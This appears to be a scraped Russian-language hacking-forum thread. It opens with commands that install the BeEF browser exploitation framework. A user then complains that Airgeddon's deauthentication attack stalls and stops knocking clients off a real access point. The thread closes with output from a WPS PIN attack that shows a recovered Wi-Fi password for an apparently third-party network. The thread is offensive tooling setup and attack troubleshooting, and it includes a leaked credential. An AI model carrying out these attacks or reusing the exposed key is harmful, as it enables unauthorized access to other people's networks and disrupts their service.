sudo apt-get install ruby sqlite sudo gem update --system sudo gem install bundler rake rubocop git clone git://github.com/beefproject/beef.git cd beef sudo bundle install # up cd .. sudo mv beef/ /opt/ echo -e '#!/bin/bash\ncd /opt/beef/\n/opt/beef/beef "$@"' > ./beef && sudo mv ./beef /bin/beef && sudo chmod +x /bin/beef https://github.com/beefproject
не знаю как у вас,но у меня баг в скрипте Airgeddon,а именно,когда уже всё запустилось,все окна,в том окне где идёт постоянный широковещательный деаут,я заметил(там же время идёт)что минут через 5 деаут прекращается.Ну например,старт деаута начался в 12-00-00 и пошло ж время,потом смотрю на часы минут через 15,в окне с деаутом же всё продолжатся должно,т.е показывать 12-15 и секунды,ну и сам деаут продолжается,а у меня в окне покахывает время например 12-07 и всё....и собственно деаут не продолжается,короче как зависает,а это же сразу баг всего скрипта,т.е клиентов с реальной точки не отключает....
и не только этот недостаток,ещё деаут не работает,т.е при запуске всего,есть окно с деаутом клиентов,так вот,он работает мин 5,дальше останавливается,т.е время не движется,на одном уровне останавливается и всё,ну мин 5 работает
- блин майнить мешаете. - в RS нет времени пробовать. - пруф 1 Apple@IPHONE:#_> WpsPin -PIN -SSID Mark -BSSID 9C6:43:3C:612 [+] Тестируем пин в Mark 9C6:43:3C:612 (22.12.2017 21:53:43) [+] Ар Найдено [+] Асоциация с точкой доступа [+] Запуск протокола [<] Поступила M1 [>] Отправка M2 [<] Поступила M3 [>] Отправка M4 [<] Поступила M5 [>] Отправка M6 [<] Поступила M7 [>] Отправка WSC NACK [*] Действительный Pin: [#] Сетевой ключ: Lena2010 Apple@IPHONE:#_> - пруф 2